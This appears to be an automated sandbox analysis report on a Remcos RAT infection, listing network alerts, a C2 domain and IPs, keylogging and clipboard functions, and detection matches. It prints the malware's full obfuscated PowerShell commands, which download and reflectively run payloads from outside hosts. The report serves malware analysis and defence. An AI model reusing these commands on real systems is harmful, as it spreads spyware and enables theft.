                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407538 _wcslen,CoGetObject,11_2_00407538
                      Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: Binary string: TenantRestrictions\PayloaddConnRouteHelper.dllrfrvbpim.pdb source: powershell.exe, 00000003.00000002.2175384475.0000000007B40000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.pdb source: powershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49713 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49715 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49718 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49720 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49717 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49711 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49721 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49722 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49716 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49719 -> 45.134.140.70:50312
                      Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 104.168.32.148:80 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 104.168.32.148:80 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49723 -> 45.134.140.70:50312
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: ramcxx.duckdns.org
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 45.134.140.70 ports 0,1,2,3,5,50312
                      Uses dynamic DNS services
                      Source: unknownDNS query: name: ramcxx.duckdns.org
                      Source: global trafficTCP traffic: 192.168.2.5:49711 -> 45.134.140.70:50312
                      Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1Host: 104.168.32.148Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewASN Name: INETLTDTR INETLTDTR
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /345/nicemeetingsofpictureclearthingstobe.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.32.148Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03747E00 URLDownloadToFileW,3_2_03747E00
                      Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /345/nicemeetingsofpictureclearthingstobe.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.32.148Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1Host: 104.168.32.148Connection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
                      Source: global trafficDNS traffic detected: DNS query: ramcxx.duckdns.org
                      Source: powershell.exe, 00000009.00000002.2256807258.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148
                      Source: powershell.exe, 00000003.00000002.2177473162.0000000008B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/
                      Source: powershell.exe, 00000009.00000002.2256807258.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/345/CHPPZA.txt
                      Source: powershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/345/niceme
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF
                      Source: powershell.exe, 00000003.00000002.2175493809.0000000007C21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFL
                      Source: powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2290069028.000000000318F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2253530010.0000000000F47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: powershell.exe, 00000009.00000002.2256807258.000000000536C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
                      Source: powershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005155000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                      Source: powershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000009.00000002.2256807258.00000000053AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archivL
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                      Source: powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content
                      Source: powershell.exe, 00000003.00000002.2177315396.0000000008A75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/UEV/icrosoft.Uev.Commands.dll
                      Source: powershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.5:49705 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000011_2_0040A2F3
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004168FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_0040A41B
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CA73 SystemParametersInfoW,11_2_0041CA73

                      System Summary

                      barindex
                      Detected Cobalt Strike Beacon
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
